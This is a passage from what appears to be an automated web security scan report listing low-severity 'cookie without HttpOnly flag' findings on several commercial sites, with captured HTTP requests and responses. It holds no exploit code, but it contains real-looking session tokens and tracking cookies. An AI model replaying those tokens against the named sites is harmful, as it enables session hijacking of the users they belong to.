http://tags.bluekai.com/site/2948
http://tags.bluekai.com/site/3358
http://web.aisle7.net/jsapi/1.0/content.js
http://webtrends.telegraph.co.uk/dcsshgbi400000gscd62rrg43_4o2o/dcs.gif
http://www.imiclk.com/cgi/r.cgi
http://www.mcafeesecure.com/ads/1002/25
https://www.mcafeesecure.com/RatingVerify
http://www.orbitz.com/favicon.ico
http://www.passporterboards.com/forums/
http://www.revresda.com/js.ng/channel=blog&Section=main&adsize=160x600&CookieName=OSC&secure=false&site=orbitz&
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy
http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

16.1. http://disneycruise.disney.go.com/reservations/customize previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://disneycruise.disney.go.com
Path:	/reservations/customize

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0E9D6993A0F39D7EDE6D567D641A2924; Path=/reservations

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reservations/customize?execution=e1s1&_eventId_searchResultsPoll=searchResultsPoll&asyncId=96792172-3d49-41c3-8208-abacf3945d4c HTTP/1.1
Host: disneycruise.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=854018943B22589E687DB21B47A5F07A; gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]; JSESSIONID=0E212034A9BDCC5CC21CFE7E312BCE40; dcl_content_persistence_cookie=4248946186.46205.0000; mbox=check#true#1305508896|session#1305508812278-378400#1305510696; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_wdpro_lid%3D%3B; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305511130529%3B; dcl_reservations_persistence_cookie=208848394.40065.0000; DCL_POOL=1; dcl_i_persistence=yyJJtWLxyeOeYaRb0W5d6AFb7O28fwyv3GG4H2ScsoS2Uzb+nxA3uJGfKxoFhfNVCKw=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E9D6993A0F39D7EDE6D567D641A2924; Path=/reservations
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Location: http://disneycruise.disney.go.com/reservations/error
Content-Length: 0
Date: Mon, 16 May 2011 01:35:27 GMT
Set-Cookie: DCL_POOL=1;path=/;

16.2. http://eval.bizrate.com/js/survey_126457_1.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://eval.bizrate.com
Path:	/js/survey_126457_1.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sessionid=720232510841276994; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:43:14 GMT; Path=/
br=13055101949906417201602020302001211; Domain=.bizrate.com; Expires=Thu, 13-May-2021 01:43:14 GMT; Path=/
_data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510194%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dsur; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:43:14 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b1139be6bc27a0107ea3fafa6bc66290a5e4901c66449407eaead3c062013e948ce98836c6ae4f48bc0a677d48de9109ba9f81c0adda9668dcf3868ac5307153b025338ebe5b5422ea4af743d0141749c639ad70ccbd31237c2a742c40719df3207ef5dd54f702632f58045b6e44bcca9d6a9060b2ca294a1c6c3e821c27f51b4679ad80bd6619d689e737f8aad5a15363b2761f8586e4ce4695ee1944d4695e2fdbad38ff824a43cc131fd452fce2a70a89ee5a7811f32ef0c544ac6f3b9c4bdbb09c0480bbc0cdeaa5da019ab9355b6b76f9f766b060164eb11

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=15AB95930407CBF65267947113A0090A; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b1139be6bc27a0107ea3fafa6bc66290a5e4901c66449407eaead3c062013e948ce98836c6ae4f48bc0a677d48de9109ba9f81c0adda9668dcf3868ac5307153b025338ebe5b5422ea4af743d0141749c639ad70ccbd31237c2a742c40719df3207ef5dd54f702632f58045b6e44bcca9d6a9060b2ca294a1c6c3e821c27f51b4679ad80bd6619d689e737f8aad5a15363b2761f8586e4ce4695ee1944d4695e2fdbad38ff824a43cc131fd452fce2a70a89ee5a7811f32ef0c544ac6f3b9c4bdbb09c0480bbc0cdeaa5da019ab9355b6b76f9f766b060164eb11 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:20:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=15AB95930407CBF65267947113A0090A; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 9407
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b3735b56bff791556b569e5e8e5242213410e46817a400930a8a5210c391eb4099bcdd45011c8c2b4edf7228481e91dc3f9c6351ac5eb78c686743ae34c0f193c0f5e25e2f9c11e68faf23a27751d30db21d18f34cfde0468a1a617f42a00cf7209ab4a9216327370b8d618eca71f90ecccf5415273b68aada887b54ba32604e61fcb904980258a678379798baa4414353b6f78ea033614b82e0ab09a5562e8c8d6a2c4c0b824a928c637f44222cd3c68a4f089e2c04760f501414adef2a7cca4fa49831a56ff1edcb91ce345c1d008e6f37a87293457074e626b842250ca5e307da3a5e46ffb4c736227395daeaaa5bc747ad115097fe63832d4021305db140de7cc84ebd182f34aa56da56d73a5ff1e5bcb2efdbf54edfb0fc746c5c8871b2ed942f4ea6203be921f533a8d8b6dfd5eb99b71b31a912f060e8d9da8ae0dd543ae249e956a8b64b1964d41954eca97247abd18e042fcb7170aed7bb7e0d7cee603452c43

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=D05F7BC705D470C181258F492A8E3ADB; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b3735b56bff791556b569e5e8e5242213410e46817a400930a8a5210c391eb4099bcdd45011c8c2b4edf7228481e91dc3f9c6351ac5eb78c686743ae34c0f193c0f5e25e2f9c11e68faf23a27751d30db21d18f34cfde0468a1a617f42a00cf7209ab4a9216327370b8d618eca71f90ecccf5415273b68aada887b54ba32604e61fcb904980258a678379798baa4414353b6f78ea033614b82e0ab09a5562e8c8d6a2c4c0b824a928c637f44222cd3c68a4f089e2c04760f501414adef2a7cca4fa49831a56ff1edcb91ce345c1d008e6f37a87293457074e626b842250ca5e307da3a5e46ffb4c736227395daeaaa5bc747ad115097fe63832d4021305db140de7cc84ebd182f34aa56da56d73a5ff1e5bcb2efdbf54edfb0fc746c5c8871b2ed942f4ea6203be921f533a8d8b6dfd5eb99b71b31a912f060e8d9da8ae0dd543ae249e956a8b64b1964d41954eca97247abd18e042fcb7170aed7bb7e0d7cee603452c43 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=15AB95930407CBF65267947113A0090A

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:27:16 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D05F7BC705D470C181258F492A8E3ADB; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 9407
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

16.5. http://shop.pacsun.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://shop.pacsun.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=4A5CD2AB14DCF8A7583336761C49C5F9; Path=/
PIPELINE_SESSION_ID=f678eccdc0a8116800f19d6e8f776319; Expires=Sat, 03-Jun-2079 04:57:37 GMT; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: shop.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://shop.pacsun.com/home.jsp
Content-Length: 0
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 01:43:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:43:30 GMT
Connection: close
Set-Cookie: JSESSIONID=4A5CD2AB14DCF8A7583336761C49C5F9; Path=/
Set-Cookie: PIPELINE_SESSION_ID=f678eccdc0a8116800f19d6e8f776319; Expires=Sat, 03-Jun-2079 04:57:37 GMT; Path=/
Set-Cookie: stop_mobi=yes; path=/; domain=pacsun.com

16.6. http://sony.links.origin.channelintelligence.com/pages/wl.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sony.links.origin.channelintelligence.com
Path:	/pages/wl.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sessionstamp=1186043; expires=Sun, 15-May-2011 21:26:46 GMT; domain=.channelintelligence.com; path=/
ASPSESSIONIDACQQQDBC=ELFBMOGDELENLLHOEJICPPEM; path=/
serverstamp=4B88CCEA%2D94CF%2DAEFC%2D64AD%2D028BB2019E0D; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.7. http://ttwbs.channelintelligence.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ttwbs.channelintelligence.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sessionstamp=1186043;Domain=.channelintelligence.com;Expires=Sun, 15-May-11 21:26:55 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.8. http://us.playstation.com/uwps/TickerMessages previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://us.playstation.com
Path:	/uwps/TickerMessages

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=QTn5NQ3McVLynCS7yQyyRSQBn2x3svQjpT02XFvfpL9c83Yy169M!-1544228896; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /uwps/TickerMessages?type=p1&id=0.7078849419485778 HTTP/1.1
Host: us.playstation.com
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/psn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=112sNQ3Q2dgJy6P6GZtTdTQ9nKLfpgTmLK7yQxnfRyJrv18FnCJH!526297085; s_vi=[CS]v1|26E81B82051D2A0E-60000127A0560B82[CE]; s_pers=%20gpv_pageName%3DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%7C1305493200691%3B%20s_nr%3D1305491400694-New%7C1337027400694%3B%20s_pv%3DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%7C1305493200696%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D45%3B%20s_sq%3Dsceaplaystationprod%253D%252526pid%25253DPSN_UPDATE/UNAUTHORIZED_INTERUSION_ALERT/LEARN_MORE/PS%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//us.playstation.com/psn/index.htm%252526ot%25253DA%3B; mbox=session#1305491190457-245340#1305493263|PC#1305491190457-245340.17#1306701003|check#true#1305491463; APPLICATION_SITE_URL=http%3A//us.playstation.com/psn/; APPLICATION_SIGNOUT_URL=http%3A//us.playstation.com/psn/; __utma=1.1480493672.1305491193.1305491193.1305491193.1; __utmc=1; __utmb=1.2.10.1305491193

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:30:04 GMT
Server: Apache
ntCoent-Length: 935
Set-Cookie: JSESSIONID=QTn5NQ3McVLynCS7yQyyRSQBn2x3svQjpT02XFvfpL9c83Yy169M!-1544228896; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/xml; charset=UTF-8
Cache-Control: private
Content-Length: 935

<messages>
<message type="p1">
<text><a onclick="javascript:ClickOmniTrack(this,'event2','FIND_OUT_MORE');" href="http://us.playstation.com/support/answer/i
...[SNIP]...

16.9. http://www.fingerhut.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=ACAC16584C19BBD23236EBA14FD093AC; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.fingerhut.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; bn_u=6923549102649626308; __g_c=w%3A1%7Cb%3A5%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3Ahttp%24*%24//www.fingerhut.com/section/Electronics/4.uts_2___1305509448582%7Cg%3A1; mbox=session#1305509219944-478846#1305511367|PC#1305509219944-478846.17#1308101507|check#true#1305509567|disable#browser%20timeout#1305513103; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305509521057

Response

16.10. http://www.fingerhut.com/fingerhut/css/sifr-config.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/fingerhut/css/sifr-config.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PIPELINE_SESSION_ID=f66ab15e7f00000159566a6cefa5c577; Expires=Sat, 03-Jun-2079 04:42:05 GMT; Path=/
JSESSIONID=6AA961A6D65048C8A38A9015E910C7F9; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fingerhut/css/sifr-config.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.fingerhut.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 2618
Date: Mon, 16 May 2011 01:27:58 GMT
Connection: close
Set-Cookie: PIPELINE_SESSION_ID=f66ab15e7f00000159566a6cefa5c577; Expires=Sat, 03-Jun-2079 04:42:05 GMT; Path=/
Set-Cookie: JSESSIONID=6AA961A6D65048C8A38A9015E910C7F9; Path=/

var bellgothicbold = { src: '/fingerhut/fonts/bellgothicbold.swf' };
var bellgothic = { src: '/fingerhut/fonts/bellgothic.swf' };

//sIFR.useStyleCheck = true;
sIFR.fromLocal = true;

// Nex
...[SNIP]...

16.11. http://www.fingerhut.com/includes/financial_snapshot.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/includes/financial_snapshot.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A5E2904F1D5EDE3A414496BAAF2441B0; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/financial_snapshot.jsp?pageStatus=isHomePage&dt=Sun+May+15+2011+20%3A32%3A07+GMT-0500+(Central+Daylight+Time) HTTP/1.1
Host: www.fingerhut.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; bn_u=6923549102649626308; JSESSIONID=E05F22119E4CB462AB851A6290099F6B; __g_c=w%3A1%7Cb%3A6%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3A%7Cg%3A1; mbox=session#1305509219944-478846#1305511385|PC#1305509219944-478846.17#1308101525|check#true#1305509585|disable#browser%20timeout#1305513103; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305509527067; utag_main=_st:1305511327472$ses_id:1305510088374%3Bexp-session

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 2175
Date: Mon, 16 May 2011 01:38:46 GMT
Connection: close
Set-Cookie: JSESSIONID=A5E2904F1D5EDE3A414496BAAF2441B0; Path=/


   <div id="financialSnapshotContainer">
       <div id="ccConatainer">
           <script type="text/javascript">
   site.func.updateHeader(0);
</script>

<div id="fsC
...[SNIP]...

16.12. http://www.fingerhut.com/js/config_dhtml.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/js/config_dhtml.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PIPELINE_SESSION_ID=f66ab4167f0000014de6f0ef39bc9c3b; Expires=Sat, 03-Jun-2079 04:42:05 GMT; Path=/
JSESSIONID=BAAF0C846A638B5EC8EAC9117571424D; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/config_dhtml.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.fingerhut.com

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=1800, must-revalidate
Last-Modified: Mon, 16 May 2011 01:27:58 GMT
Content-Length: 684
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:27:58 GMT
Connection: close
Set-Cookie: PIPELINE_SESSION_ID=f66ab4167f0000014de6f0ef39bc9c3b; Expires=Sat, 03-Jun-2079 04:42:05 GMT; Path=/
Set-Cookie: JSESSIONID=BAAF0C846A638B5EC8EAC9117571424D; Path=/

// Function: S7ConfigObject()
// Purpose: Constructor for the S7ConfigObject class
// Param: None
